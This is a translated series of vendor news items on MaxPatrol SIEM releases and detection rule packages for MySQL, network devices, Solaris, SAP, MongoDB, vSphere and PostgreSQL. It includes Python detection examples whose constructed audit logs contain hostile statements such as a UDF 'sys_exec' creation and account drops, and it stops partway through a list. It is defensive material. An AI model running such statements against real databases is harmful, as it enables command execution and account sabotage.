Positive Technologies announced on June 16, 2022 the release of an updated version of the MaxPatrol SIEM information security event monitoring system, 7.0. The main things in the release are support for Linux operating systems, the ability to conduct distributed event searches to identify attacks on large, geographically extensive infrastructures, and simpler management of asset significance from the point of view of information security. MaxPatrol SIEM 7.0 received support for Linux operating systems. In 2020, more than 1 million licenses for the Astra Linux OS were purchased, and the total number of organizations using this software exceeds 4 thousand. Now the product can be deployed by government departments, state corporations, critical information infrastructure entities and organizations that already use Linux or are switching to it within the framework of import substitution. The ability to install MaxPatrol SIEM on domestic OS distributions is especially relevant for Russian companies in the current realities. The system also supports Debian 10.

"We have long felt the need for customers to use a single platform for all product components. This greatly simplifies the deployment and operation of the system, which is the company's main priority in the development of its information security solutions. And support for domestic Linux distributions simplifies the fulfillment of import substitution requirements," commented Roman Sergeyev, Product Development Manager of MaxPatrol SIEM, Positive Technologies.

According to Positive Technologies, 15% of information security specialists consider monitoring of subordinate divisions the most time-consuming activity in a SIEM system. This problem is characteristic primarily of organizations with a large, geographically extensive infrastructure. With distributed event search, MaxPatrol SIEM users see the big picture of information security and can quickly identify complex, non-typical attacks aimed at the infrastructure of an individual unit or of the enterprise as a whole. Events from all installations are available to the head-end operator for searching, filtering, grouping, aggregation and reporting.

Network infrastructure nodes, which number in the tens and hundreds of thousands, differ in importance from the point of view of information security. So that operators are not unnecessarily distracted by less important assets, MaxPatrol SIEM 7.0 adds the ability to assign significance to assets using a policy. For example, all domain controllers can be assigned a high level of significance; the function works automatically, which saves MaxPatrol SIEM users from routine operations. The significance of an asset can be manually overridden at any time.

Starting with version 7.0, the product supports LogSpace, an event store specially developed by Positive Technologies. Its use increases the efficiency of disk resource usage by 5-7 times, so MaxPatrol SIEM users can either reduce their hardware costs or increase event storage depth with the resources they already have. Customers still have the option of using the usual Elasticsearch storage.

MaxPatrol SIEM 7.0 also improves the performance of the correlator responsible for detecting malicious activity: RAM consumption is optimized, throughput is increased, and multiple processor cores can be used. Queries for filtering events are now saved in history and can be reused. This is especially useful for SIEM operators when testing hypotheses with PDQL queries during investigations.

"MaxPatrol SIEM 7.0 is a long-awaited release. It combines updates that affect the system (for example, the ability to use Linux operating systems, including certified versions, and the transition to a proprietary database that meets client requests for processing significant event flows) and architectural updates, namely horizontal scaling for distributed event search. This version of the system also contains many improvements that increase the convenience of the day-to-day work of information security analysts investigating cybersecurity incidents. The MaxPatrol SIEM development team has done significant work to make the product effective in the distributed environments of large enterprise customers," confirmed Elman Beibutov, Head of Information Security Event Monitoring at Positive Technologies.

2021

Release of an expertise package to identify attacks on MySQL DBMS

Positive Technologies announced on December 2, 2021 that another examination package with a set of threat detection rules had been loaded into the MaxPatrol SIEM incident detection system. By installing the package, users will be able to detect suspicious activity in the MySQL Enterprise Edition DBMS. This will allow specialists to quickly localize attacks and prevent data breaches or DBMS outages.

According to 78% of information security specialists in Russia, the main goal that attackers pursue when attacking their companies is the theft of valuable information. In the second quarter of 2021, attackers stole personal data in 36% of attacks, trade secrets in 22%, and customer databases in 3%. Companies can store such information in database management systems.


MySQL is the second most popular DBMS in the world. Positive Technologies specialists studied how MySQL Enterprise Edition is attacked and created an examination package with rules for detecting the actions of attackers. This package is the fifth in a row aimed at identifying attacks on popular DBMS. In August 2021, rule sets for detecting attacks on PostgreSQL, Oracle Database, Microsoft SQL Server and MongoDB were loaded into MaxPatrol SIEM.

"If an attacker gains access to the DBMS and goes unnoticed, he will be able to control the company's business processes, disrupt them if he wants, and moreover, this will allow him to expand the attack and compromise the entire local network," explains Kostyakov, a specialist in the business systems and database security department at Positive Technologies.

Thanks to these rules, MaxPatrol SIEM users will be able to identify cases when attackers:

  • try to access the command execution environment using user-defined functions (UDF), which allow commands to be executed on the server through the database; as a result, attackers can take possession of the infrastructure or develop their attack;
  • clear the list of blocked IP addresses, which can be used to bypass restrictions on connecting to the DBMS;
  • guess passwords for accounts with access to MySQL;
  • read the audit table for reconnaissance purposes: from the table one can learn the IP addresses of users and, indirectly, their privileges, which can be used to develop an attack;
  • change user rights or delete accounts, for example to restrict administrators' access to the system.
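Four of the actions listed above turned into detection logic over audit records, as an added example that is not part of the expertise package and not Positive Technologies' code. The record layout is a simplified, constructed stand-in for a JSON audit log (not the real MySQL Enterprise Audit schema), and the thresholds and administrator list are assumptions.

```python
"""Added example: rule logic over constructed MySQL audit records.

Assumptions: one JSON object per line with the fields ts (seconds), event
("connect" or "query"), status (0 = success), login.user, login.ip and query;
FAILED_LOGIN_LIMIT, WINDOW_SECONDS and GRANT_ADMINS are assumed settings.
"""
import json
from collections import defaultdict

FAILED_LOGIN_LIMIT = 5   # assumed: failed connects from one IP before alerting
WINDOW_SECONDS = 60      # assumed: sliding window for counting failed connects
GRANT_ADMINS = {"root"}  # assumed: accounts allowed to drop users or revoke rights

# Constructed audit log (not real records): a password-guessing burst, then a
# non-admin application account creating a UDF, reading the audit table and
# deleting an account, then a legitimate REVOKE by root.
SAMPLE_AUDIT_LOG = "\n".join(json.dumps(r) for r in [
    *[{"ts": 1000 + i, "event": "connect", "status": 1,
       "login": {"user": "admin", "ip": "203.0.113.9"}} for i in range(6)],
    {"ts": 1100, "event": "query", "status": 0, "login": {"user": "app", "ip": "10.0.0.4"},
     "query": "CREATE FUNCTION sys_exec RETURNS STRING SONAME 'udf.so'"},
    {"ts": 1101, "event": "query", "status": 0, "login": {"user": "app", "ip": "10.0.0.4"},
     "query": "SELECT * FROM mysql.audit_log_user"},
    {"ts": 1102, "event": "query", "status": 0, "login": {"user": "app", "ip": "10.0.0.4"},
     "query": "DROP USER 'admin'@'%'"},
    {"ts": 1103, "event": "query", "status": 0, "login": {"user": "root", "ip": "10.0.0.2"},
     "query": "REVOKE ALL ON *.* FROM 'old'@'%'"},
])


def detect_mysql(audit_text):
    """Return (rule name, subject) pairs for every rule that fires, in log order."""
    findings = []
    failures = defaultdict(list)  # source IP -> timestamps of recent failed connects
    for line in audit_text.splitlines():
        rec = json.loads(line)
        ts, user, ip = rec["ts"], rec["login"]["user"], rec["login"]["ip"]
        # Password guessing: N failed connects from one address inside the window.
        if rec["event"] == "connect" and rec["status"] != 0:
            failures[ip] = [t for t in failures[ip] if ts - t <= WINDOW_SECONDS] + [ts]
            if len(failures[ip]) == FAILED_LOGIN_LIMIT:  # alert once per burst
                findings.append(("password guessing", ip))
            continue
        if rec["event"] != "query":
            continue
        q = rec.get("query", "").strip().upper()
        # UDF loaded from a shared library: command execution through the database.
        if "CREATE FUNCTION" in q and "SONAME" in q:
            findings.append(("udf creation", user))
        # Audit table read by a non-admin: reconnaissance of users and their addresses.
        if q.startswith("SELECT") and "AUDIT_LOG" in q and user not in GRANT_ADMINS:
            findings.append(("audit table reconnaissance", user))
        # Account deletion or rights change by an account that is not an administrator.
        if q.startswith(("DROP USER", "REVOKE")) and user not in GRANT_ADMINS:
            findings.append(("privilege change by non-admin", user))
    return findings


if __name__ == "__main__":
    for rule, subject in detect_mysql(SAMPLE_AUDIT_LOG):
        print(f"{rule}: {subject}")
```

The failed-connect rule fires exactly once when the count reaches the limit, which keeps a long burst from producing one alert per attempt; a production rule would also want to clear the window on a successful login from the same address.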

In total, the examination package allows you to identify 21 suspicious actions in MySQL. To start using the expertise package for identifying attacks on MySQL, you need to update MaxPatrol SIEM to version 6.1 or 6.2 and then install the rules from the expertise package.

Integration with Kolchuga-K IVC

Positive Technologies and Information Implementation Company on October 5, 2021 announced the completion of the integration of the MaxPatrol SIEM incident detection system with a firewall for protecting limited access data "Kolchuga-K IVC." Read more here.

Loading a package to detect signs of compromise of firewalls, routers and switches

On August 31, 2021, Positive Technologies announced that another examination package was loaded into the MaxPatrol SIEM incident detection system. It includes rules for detecting signs of compromise of firewalls, routers and switches. By compromising such network devices, attackers can quickly develop an attack inside the network and reach their targets.

By installing the examination package, MaxPatrol SIEM users will be able to identify indicators of compromise of Cisco ASA firewalls, Check Point firewalls with the GAiA operating system, MikroTik routers, and Cisco routers and switches with the IOS operating system. The added rules will allow you to quickly localize an attack before attackers change network access policies and gain access to closed segments.

The added MaxPatrol SIEM examination package included ten compromise indicators, including:

  • attempts to connect, or a successful connection, to the Check Point GAiA management server using the SmartConsole utility from an untrusted network node (one not included in the list of nodes from which device administration is allowed);
  • a change to the logging settings on a Cisco ASA device under which, on failed authentication, user logins are saved in the log in clear text; this allows attackers to intercept credentials, including passwords, if a user mistakenly enters the password in the login field;
  • an attempt to connect to a MikroTik device from an untrusted node using the Winbox administration utility.

Some of the indicators require the PT Network Attack Discovery (PT NAD) traffic analysis system, which parses the contents of network packets. Together, the two products give a more complete picture of the IT infrastructure and identify incidents more accurately:

  • modification of the configuration file on Cisco IOS devices from an untrusted network node;
  • transmission of large ICMP packets, which attackers can use to carry data, including payloads;
  • attempts to exploit CVE-2018-0171, a critical vulnerability in Cisco Smart Install, the feature that automates the initial deployment of the operating system image on some Cisco switches. Through this vulnerability an unauthenticated attacker can reload the equipment, cause a temporary denial of service, or execute arbitrary code.

To start using this package, update MaxPatrol SIEM to version 6.1 or 6.2 and install the rules from it.

MaxPatrol SIEM 6.2 with up to 60,000 events per second

On August 24, 2021, Positive Technologies announced the release of MaxPatrol SIEM 6.2. The update raises event processing throughput to 60,000 EPS, lets operators investigate across all installations more quickly, and allows event collection and subsequent processing to be split between several MaxPatrol SIEM instances.

More than half of SIEM users are large companies with 1,000 to 10,000 employees or more, according to IDC. The capabilities of the updated version of MaxPatrol SIEM are especially relevant for organizations with a large geographically distributed infrastructure.

MaxPatrol SIEM identifies incidents in the largest Russian companies. Such organizations need to ensure security not only in the head office but also in branches, - comments Alexey Andreev, Managing Director of Positive Technologies. - So that companies can cover their entire hierarchical infrastructure as fully as possible, we are systematically increasing the performance of MaxPatrol SIEM. Over the year, processing speed has increased 1.5 times.

To increase event storage performance and reduce hardware costs, MaxPatrol SIEM 6.2 users can switch to a hybrid storage scheme: the most recent daily indices are written to high-speed solid-state drives (SSDs) and over time are migrated to cheaper hard disk drives (HDDs). This speeds up event processing while search queries run concurrently.

Among the most laborious tasks when working with a SIEM, 15% of information security specialists name monitoring the security situation in subordinate branches. In version 6.2, MaxPatrol SIEM users can quickly spot signs of attacks on the infrastructure of the whole enterprise: the operator of the head site has a distributed event search that filters events of all subordinate sites at once and shows the overall security picture. Previously, a user could search events only within an individual installation. Now events from all sites are available for grouping, aggregation, display on widgets and reporting.

[Figure: configuring distributed event search in an infrastructure with two subordinate sites]

Organizations with complex, branched structures may need to split event collection and subsequent processing across several MaxPatrol SIEM instances, for example to process events with different sets of normalization rules or to balance load between servers. As of release 6.2, several MaxPatrol SIEM instances can process the same event stream: one instance collects events centrally, and the others process them afterwards.

Installation on Debian 10 has been supported since the previous version; as of release 6.2 (24.1), support for Debian 9 is discontinued.

Loading an Expertise Package to Detect Attacks on Oracle Solaris

On June 29, 2021, Positive Technologies announced that an expertise package for detecting attacks on the Oracle Solaris operating system had been added to the MaxPatrol SIEM incident detection system. Its threat detection rules let users spot an attacker's presence in time and prevent disruption of the system.

Oracle Solaris is a Unix-like operating system that large companies often use to deploy automated process control systems, databases such as Oracle Database, and web servers, - comments Evgeny Polonsky, a specialist in the Unix systems security department at Positive Technologies. - By gaining access to a system running Oracle Solaris, attackers can control it, even disable or damage it, and compromise data.

To help companies secure systems deployed on Oracle Solaris, Positive Technologies experts have developed detection methods for common threats and combined them into a single expertise package. Its rules detect several techniques from the MITRE ATT&CK matrix that attackers use for persistence, discovery and communication with the command and control server. For example, MaxPatrol SIEM users can now identify:

  • the launch of reverse shell and bind shell remote access tools, which attackers use to control the target system;
  • the activity of utilities and automated scripts running under web server accounts, which attackers use during reconnaissance to gather information about the compromised system and its network environment;
  • the start of a service or client used to set up a hidden connection or to scan the network;
  • the activity of tunneling utilities, which attackers need to create a communication channel with the compromised host.

To start using the new package, update MaxPatrol SIEM to version 6.1 and install the rules from it.

Loading an Expert Review Package to Detect Attacks on SAP NetWeaver Application Server Java

Another expertise package has been loaded into the MaxPatrol SIEM incident detection system, Positive Technologies announced on May 28, 2021. It detects suspicious user activity on the SAP NetWeaver Application Server Java platform. The rules help stop intruders in time, before attacks such as denial of service or privilege escalation to the administrator level give them access to the SAP system.

Many companies use SAP business applications to manage financial flows, product lifecycle, supplier and customer relations, enterprise resources and critical business processes. Therefore the security of information stored in SAP systems is of great importance, and a breach of its confidentiality can have catastrophic consequences for the business, - said Stanislav Zavgorodny, a specialist in the business systems and database security department at Positive Technologies.

As of 2019, SAP's share of the global business application market was 7.7%. SAP NetWeaver Application Server Java serves as the application server for SAP business applications; it hosts SAP Portal and SAP Process Integration, which integrates SAP and third-party applications.

Positive Technologies experts have developed a dedicated expertise package for detecting attacks on SAP NetWeaver Application Server Java. It includes 10 threat detection rules. The rules identify several attack techniques from the MITRE ATT&CK matrix that attackers use to elevate privileges, obtain credentials and affect compromised systems. For example, with this package users can detect cases when attackers:

  • try to guess the password of an account;
  • add a user to the SAP system administrators group to elevate privileges;
  • log on to SAP with the same account from different devices;
  • reset the password of one account several times within 5 minutes;
  • carry out a denial-of-service attack by deliberately entering wrong passwords for user accounts so that they are locked automatically.
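Most of the rules above are stateful: they count events per account or per source over a time window instead of reacting to a single event. The following Python is an added example, not MaxPatrol SIEM code, of that sliding-window correlation; the event field names, the thresholds (including the assumed lockout policy) and the sample events are constructed for the example:

```python
"""Sliding-window correlation over SAP NetWeaver AS Java logon and admin events.

Added example, not MaxPatrol SIEM code. Event field names ("type", "account",
"src", "device", "group", "by") and the thresholds are assumptions; the events
are constructed for the example.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
RESET_THRESHOLD = 3       # password resets of one account within WINDOW
LOCKOUT_THRESHOLD = 5     # failed logons after which SAP locks the account (assumed policy)
LOCKOUT_DOS_ACCOUNTS = 3  # distinct accounts locked from one source within WINDOW
ADMIN_GROUP = "Administrators"


class SapCorrelator:
    """Keeps a per-key deque of (timestamp, value) pairs and evaluates threshold rules."""

    def __init__(self):
        self.resets = defaultdict(deque)    # account -> [(ts, None)]
        self.devices = defaultdict(deque)   # account -> [(ts, device)]
        self.failures = defaultdict(deque)  # account -> [(ts, None)]
        self.locked = defaultdict(deque)    # source -> [(ts, account)]

    @staticmethod
    def _prune(dq, now):
        """Drop entries older than WINDOW so every count is taken over a sliding window."""
        while dq and dq[0][0] < now - WINDOW:
            dq.popleft()

    def process(self, ev):
        """Feed one event (events must arrive in time order); return the alerts it raises."""
        now = datetime.fromisoformat(ev["ts"])
        kind, acct, src = ev["type"], ev["account"], ev.get("src")
        alerts = []

        if kind == "group_add" and ev.get("group") == ADMIN_GROUP:
            # Stateless rule: membership in the SAP administrators group is always worth an alert.
            alerts.append(f"privilege escalation: {acct} added to {ADMIN_GROUP} by {ev.get('by')}")

        elif kind == "password_reset":
            dq = self.resets[acct]
            dq.append((now, None))
            self._prune(dq, now)
            if len(dq) >= RESET_THRESHOLD:
                alerts.append(f"{len(dq)} password resets for {acct} within {WINDOW}")

        elif kind == "logon_success":
            dq = self.devices[acct]
            dq.append((now, ev["device"]))
            self._prune(dq, now)
            seen = {device for _, device in dq}
            if len(seen) > 1:
                alerts.append(f"{acct} logged on from {len(seen)} devices within {WINDOW}: {sorted(seen)}")

        elif kind == "logon_failed":
            dq = self.failures[acct]
            dq.append((now, None))
            self._prune(dq, now)
            if len(dq) == LOCKOUT_THRESHOLD:  # exactly at the threshold: the account has just been locked
                locked = self.locked[src]
                locked.append((now, acct))
                self._prune(locked, now)
                accounts = {a for _, a in locked}
                if len(accounts) >= LOCKOUT_DOS_ACCOUNTS:
                    alerts.append(f"lockout DoS from {src}: {len(accounts)} accounts locked within {WINDOW}")
        return alerts


def run(events):
    """Replay an event list through a fresh correlator and collect every alert."""
    corr = SapCorrelator()
    alerts = []
    for ev in events:
        alerts.extend(corr.process(ev))
    return alerts


def _failed_logons(base, source, accounts):
    """Constructed burst: LOCKOUT_THRESHOLD wrong passwords per account, one account per minute."""
    out = []
    for n, acct in enumerate(accounts):
        for k in range(LOCKOUT_THRESHOLD):
            ts = base + timedelta(seconds=n * 60 + k * 5)
            out.append({"ts": ts.isoformat(), "type": "logon_failed", "account": acct, "src": source})
    return out


# Constructed sample stream (not real SAP logs), in chronological order.
SAMPLE_EVENTS = [
    {"ts": "2021-05-28T09:00:00", "type": "logon_success", "account": "j.doe", "src": "10.1.1.10", "device": "WS-0412"},
    {"ts": "2021-05-28T09:01:30", "type": "logon_success", "account": "j.doe", "src": "10.1.1.50", "device": "LT-9931"},
    {"ts": "2021-05-28T09:05:00", "type": "password_reset", "account": "svc_portal", "src": "10.1.1.50"},
    {"ts": "2021-05-28T09:06:00", "type": "password_reset", "account": "svc_portal", "src": "10.1.1.50"},
    {"ts": "2021-05-28T09:07:00", "type": "password_reset", "account": "svc_portal", "src": "10.1.1.50"},
    {"ts": "2021-05-28T09:10:00", "type": "group_add", "account": "j.doe", "group": "Administrators", "by": "svc_portal"},
] + _failed_logons(datetime(2021, 5, 28, 9, 20), "10.1.1.50", ["a.ivanov", "b.petrov", "c.sidorov"])

if __name__ == "__main__":
    for line in run(SAMPLE_EVENTS):
        print(line)
```

Replaying the sample raises four alerts: the second-device logon, the third password reset, the group change, and the lockout DoS once the third account hits the threshold. The lockout rule fires only at exactly the threshold so a continuing brute force does not re-alert on every further failure; a real deployment would also clear the per-source state when the accounts are unlocked.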

To start using this package, update MaxPatrol SIEM to version 6.1 and install the rules from it.

Loading the examination package for detecting intruders in the MongoDB DBMS

An expertise package for quickly detecting attackers in the MongoDB Enterprise Server database management system has been loaded into the MaxPatrol SIEM incident detection system, Positive Technologies announced on April 27, 2021. Its threat detection rules help identify attacker activity at different stages of an attack and prevent data theft and system failure.

According to the developer's research, obtaining data remains the main motive of cyberattacks on companies: it accounts for 61% of all incidents. Most often attackers obtain personal data (32%), trade secrets (26%) and credentials (20%). Such information may be stored in database management systems.

Often, because of DBMS misconfiguration, a MongoDB instance is left open and accessible from the Internet to any user, - comments Jan Guber, a specialist in the business systems and database security department at Positive Technologies. - In Russia, as of April 2021, there are about 1,600 publicly accessible MongoDB servers. Attackers can find such DBMSs with specialized search engines and easily obtain the confidential data in them. Because the data is so easy to reach, MongoDB servers remain in hackers' crosshairs.

To help MaxPatrol SIEM users whose IT infrastructure includes MongoDB Enterprise Server strengthen their security, Positive Technologies has released a dedicated expertise package.

The package includes rules for detecting attacks at the privilege escalation, credential access, discovery and impact stages. With it installed, MaxPatrol SIEM users can detect suspicious actions such as:

  • creation of users with high privileges;
  • backup or deletion of databases;
  • viewing of user data and passwords;
  • retrieval of information about user roles;
  • connections from popular penetration testing distributions;
  • deletion of multiple collections.
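MongoDB Enterprise writes its audit trail as one JSON object per line, which is what a SIEM normalizes to detect the actions above. The following Python is an added example, not MaxPatrol SIEM code, of triaging such lines; the field names follow the documented MongoDB audit event shape (atype, param, users, remote, result), but the log lines, the privileged-role list and the drop threshold are constructed assumptions:

```python
"""Triage of MongoDB Enterprise audit log lines (JSON format).

Added example, not MaxPatrol SIEM code. Field names follow the documented
MongoDB audit event shape; the log lines themselves are constructed, and the
privileged-role list and the drop threshold are assumptions.
"""
import json
from collections import Counter

# Built-in roles that give control over every database or over user management.
PRIVILEGED_ROLES = {"root", "userAdminAnyDatabase", "dbAdminAnyDatabase",
                    "readWriteAnyDatabase", "clusterAdmin", "userAdmin"}
MULTI_DROP_THRESHOLD = 3  # dropCollection events by one client that trigger an alert


def _who(ev):
    """Actor string: authenticated users plus client address, as recorded in the event."""
    users = ",".join(f"{u['user']}@{u['db']}" for u in ev.get("users", [])) or "anonymous"
    return f"{users} from {ev.get('remote', {}).get('ip', '?')}"


def classify(ev):
    """Return an alert string for one parsed audit event, or None."""
    atype, param = ev.get("atype"), ev.get("param", {})
    if ev.get("result", 0) != 0:
        return None  # failed/unauthorized operations are audited too; only successful ones count here
    if atype in ("createUser", "grantRolesToUser"):
        roles = {r["role"] for r in param.get("roles", [])}
        if roles & PRIVILEGED_ROLES:
            return (f"privileged roles {sorted(roles & PRIVILEGED_ROLES)} granted to "
                    f"{param['user']}@{param['db']} by {_who(ev)}")
    elif atype == "dropDatabase":
        return f"database dropped: {param.get('ns')} by {_who(ev)}"
    elif atype == "authCheck":
        # Emitted per command when auditAuthorizationSuccess is enabled (assumed on here).
        ns, cmd = param.get("ns", ""), param.get("command")
        if ns.endswith("system.users") or cmd == "usersInfo":
            return f"user/role data read ({cmd} on {ns}) by {_who(ev)}"
    return None


def analyze(lines):
    """Parse audit log lines and return alerts in the order they are raised."""
    alerts, drops = [], Counter()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        alert = classify(ev)
        if alert:
            alerts.append(alert)
        if ev.get("atype") == "dropCollection" and ev.get("result", 0) == 0:
            actor = _who(ev)
            drops[actor] += 1
            if drops[actor] == MULTI_DROP_THRESHOLD:
                alerts.append(f"multiple collections dropped ({MULTI_DROP_THRESHOLD}+) by {actor}")
    return alerts


# Constructed sample log: one over-privileged "app" session from 10.0.0.99, then a refused drop.
SAMPLE_AUDIT_LOG = """
{"atype":"authenticate","ts":{"$date":"2021-04-27T10:14:58.000+03:00"},"local":{"ip":"10.0.0.20","port":27017},"remote":{"ip":"10.0.0.99","port":51230},"users":[],"roles":[],"param":{"user":"app","db":"shop","mechanism":"SCRAM-SHA-256"},"result":0}
{"atype":"authCheck","ts":{"$date":"2021-04-27T10:15:05.000+03:00"},"local":{"ip":"10.0.0.20","port":27017},"remote":{"ip":"10.0.0.99","port":51230},"users":[{"user":"app","db":"shop"}],"roles":[{"role":"root","db":"admin"}],"param":{"command":"find","ns":"admin.system.users","args":{"find":"system.users"}},"result":0}
{"atype":"createUser","ts":{"$date":"2021-04-27T10:15:40.000+03:00"},"local":{"ip":"10.0.0.20","port":27017},"remote":{"ip":"10.0.0.99","port":51230},"users":[{"user":"app","db":"shop"}],"roles":[{"role":"root","db":"admin"}],"param":{"user":"backup_svc","db":"admin","roles":[{"role":"root","db":"admin"}]},"result":0}
{"atype":"createUser","ts":{"$date":"2021-04-27T10:16:02.000+03:00"},"local":{"ip":"10.0.0.20","port":27017},"remote":{"ip":"10.0.0.99","port":51230},"users":[{"user":"app","db":"shop"}],"roles":[{"role":"root","db":"admin"}],"param":{"user":"reporter","db":"shop","roles":[{"role":"read","db":"shop"}]},"result":0}
{"atype":"dropCollection","ts":{"$date":"2021-04-27T10:17:10.000+03:00"},"local":{"ip":"10.0.0.20","port":27017},"remote":{"ip":"10.0.0.99","port":51230},"users":[{"user":"app","db":"shop"}],"roles":[{"role":"root","db":"admin"}],"param":{"ns":"shop.orders"},"result":0}
{"atype":"dropCollection","ts":{"$date":"2021-04-27T10:17:11.000+03:00"},"local":{"ip":"10.0.0.20","port":27017},"remote":{"ip":"10.0.0.99","port":51230},"users":[{"user":"app","db":"shop"}],"roles":[{"role":"root","db":"admin"}],"param":{"ns":"shop.customers"},"result":0}
{"atype":"dropCollection","ts":{"$date":"2021-04-27T10:17:12.000+03:00"},"local":{"ip":"10.0.0.20","port":27017},"remote":{"ip":"10.0.0.99","port":51230},"users":[{"user":"app","db":"shop"}],"roles":[{"role":"root","db":"admin"}],"param":{"ns":"shop.invoices"},"result":0}
{"atype":"dropDatabase","ts":{"$date":"2021-04-27T10:17:30.000+03:00"},"local":{"ip":"10.0.0.20","port":27017},"remote":{"ip":"10.0.0.99","port":51230},"users":[{"user":"app","db":"shop"}],"roles":[{"role":"root","db":"admin"}],"param":{"ns":"shop"},"result":0}
{"atype":"dropDatabase","ts":{"$date":"2021-04-27T10:18:00.000+03:00"},"local":{"ip":"10.0.0.20","port":27017},"remote":{"ip":"10.0.0.77","port":40022},"users":[{"user":"reporter","db":"shop"}],"roles":[{"role":"read","db":"shop"}],"param":{"ns":"archive"},"result":13}
"""

if __name__ == "__main__":
    for alert in analyze(SAMPLE_AUDIT_LOG.splitlines()):
        print(alert)
```

The sample yields four alerts: the read of admin.system.users, the creation of backup_svc with the root role, the third dropped collection, and the dropped shop database; the read-only "reporter" user and the refused (result 13) drop produce nothing. Filtering on result is deliberate, since an audit log records attempts as well as successes and the two deserve different handling.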

To start using the new package, update MaxPatrol SIEM to version 6.1 and install the rules from it.

MaxPatrol SIEM All-in-One License Release for Small Credit Institutions

Positive Technologies on April 8, 2021 issued a special license for the MaxPatrol SIEM All-in-One incident detection system for small credit institutions.

A third of all companies using SIEM are financial institutions, according to Positive Technologies. At the same time, 5% of financial companies have a low information security budget (2 to 5 million rubles per year) and 19% have 5 to 10 million rubles. Companies usually begin using SIEM systems once their information security budget exceeds 10 million rubles a year.

With MaxPatrol SIEM All-in-One, credit organizations can detect attacks in real time and significantly strengthen the security of critical infrastructure. Even with a limited budget and regardless of their current information security maturity, companies will be able to get a high-quality SIEM that has proven itself among players in the financial industry, - comments Natalia Kazankova, product marketing manager at Positive Technologies. - The product covers 108 technical measures of GOST R 57580.1-2017 and is certified to the requirements of the FSTEC of Russia.

Even small banks will now be able to comply with the national standard GOST R 57580.1-2017 "Security of financial (banking) operations. Information protection of financial organizations. Basic set of organizational and technical measures." Specifically for companies in this sector with a small IT infrastructure, Positive Technologies has released a license for 100 network nodes. It costs 2.2 million rubles; this is the price recommended to Positive Technologies authorized partners, who may reduce it at their discretion.

The company recalled that from January 1, 2021, GOST R 57580.1-2017 became mandatory for all credit institutions (based on Bank of Russia Regulation No. 683-P of April 17, 2019).

To comply with GOST R 57580.1-2017, banks need a SIEM, since it implements the measures of the "Information Security Incident Management" process. This process includes 33 mandatory technical measures for monitoring and analyzing information protection events, detecting incidents and responding to them. Beyond the incident management process, MaxPatrol SIEM All-in-One covers another 75 technical measures of the standard.

Ability to identify intruders in the VMware vSphere platform

Users of MaxPatrol SIEM 6.1 can now detect malicious activity in the VMware vSphere virtualization platform, Positive Technologies announced on February 19, 2021. This helps prevent data theft, disabling of security tools, downtime of business processes and other consequences of attacks on virtual infrastructure.

VMware is one of the developers of virtualization software. According to a study by Spiceworks, 79% of large businesses in the world use vSphere.

More than 90% of companies deploy the bulk of their server infrastructure in a virtual environment, - comments Kirill Antonenko, head of Unix security at Positive Technologies. - This is convenient but carries risk: problems may arise if attackers take over a vSphere account and gain access to the entire virtual infrastructure.

The expertise package includes rules for detecting threats that attackers can carry out after gaining access to vSphere. The rules fire when attackers:

  • clone critical virtual machines, such as domain controllers or VPN, DNS or DHCP servers. By copying such a machine, attackers can study it in detail and extract valuable data without attracting the attention of security tools;
  • copy files from the hard disk of a critical virtual server;
  • try to power off virtual machines on which security tools are deployed, or change their settings. This can help attackers hide their subsequent actions from antivirus, firewalls and SIEM systems.

MaxPatrol SIEM identifies virtual machines holding critical data and security tools automatically, by the roles assigned to them in the network and the software installed on them. The list of monitored machines can be extended manually.

MaxPatrol SIEM 6.1

On February 16, 2021, Positive Technologies announced the release of version 6.1 of the MaxPatrol SIEM incident detection system. It lets users quickly find and refresh IT assets with outdated data, stores detected incidents in a PostgreSQL database, and shows the load on the correlator.


According to the company, previously, when data collection started, network scanning tasks were immediately distributed among the agents. This could lead to uneven agent utilization and growing task queues. Tasks are now handed to agents as their resources free up. As a result, agents are loaded more evenly and data on IT assets in the network is updated faster.

To keep IT infrastructure information up-to-date, MaxPatrol SIEM 6.1 users can set the expiration date for asset information. You can track assets with irrelevant data using a special widget and asset filtering.

When investigating incidents, it is important to track changes in IT assets. Previously, filtering the asset database showed asset data only as of the current moment; to find an asset's earlier state you had to open each asset's card. In MaxPatrol SIEM 6.1, a specific moment or period in the past can be specified in the search bar, through dedicated fields in the interface and in PDQL queries.

Security incidents detected by MaxPatrol SIEM are now stored in the PostgreSQL DBMS. Previously the product used Microsoft SQL Server, whose free edition caps the database at 10 GB; once that volume was reached, the database had to be cleaned manually or an unlimited SQL Server license purchased. With the move to PostgreSQL, MaxPatrol SIEM users are not limited in the amount of incident data the product can store and process.

We chose the PostgreSQL DBMS because it is cross-platform and works on both Windows and Linux. This matters because in the next version of MaxPatrol SIEM we plan to let users install the product entirely on Linux, - said Alexey Andreev, Managing Director of Research and Development at Positive Technologies.

MaxPatrol SIEM 6.1 adds features for working with dashboards. Users can place any number of widgets on a dashboard in the order they want and change widget width. Dashboards can also be shared with colleagues: save the dashboard as a template, and other users of the same MaxPatrol SIEM installation can use it. Another change is two new widgets that track the number of assets without an assigned significance level and the freshness of asset information (an expiration date must be set first).

MaxPatrol SIEM 6.1 has added event fields related to user authentication, account and group actions, process startup, and query execution. You can start using them in event normalization rules and risk detection rules (correlation rules).

MaxPatrol SIEM 6.1 identifies the correlation rules that consume the most RAM and place additional load on the correlator. This shows which rules should be rewritten or tuned so that they fire more precisely, without waiting a long time for missing triggering conditions.

MaxPatrol SIEM 6.1 supports importing data into PT Knowledge Base and works with updated versions of the Elasticsearch search engine and the Debian operating system. Thanks to installer optimization, the product installs and updates 25% faster.

2020

Loading the examination package to detect suspicious activity in the PostgreSQL DBMS

An expertise package for detecting suspicious activity in the PostgreSQL database management system has been added to the MaxPatrol SIEM incident detection system, Positive Technologies announced on November 5, 2020.

The rules in the package will help users quickly detect intruders and prevent data theft and system outage.

PostgreSQL is the third most common DBMS in Russian state institutions and large companies; in 2019 it was used in 51% of such organizations. According to Positive Technologies, obtaining data was the main motive of cybercriminals in the second quarter of 2020. Most often, credentials, personal data, and information constituting commercial secrets and customer databases were stolen; such information accounted for 80% of thefts. Since this data is usually kept in database management systems, DBMSs often become the target of attacks.

For MaxPatrol SIEM users whose infrastructure includes PostgreSQL, the Positive Technologies R&D team has released an expertise package with rules for detecting attacks carried out through queries to the DBMS. The rules detect suspicious activities such as:

  • sending commands that determine the database version (indicates the start of an attack on the DBMS);
  • reading tables that contain password hashes;
  • disabling auditing;
  • changing the severity level of audit messages to hide actions;
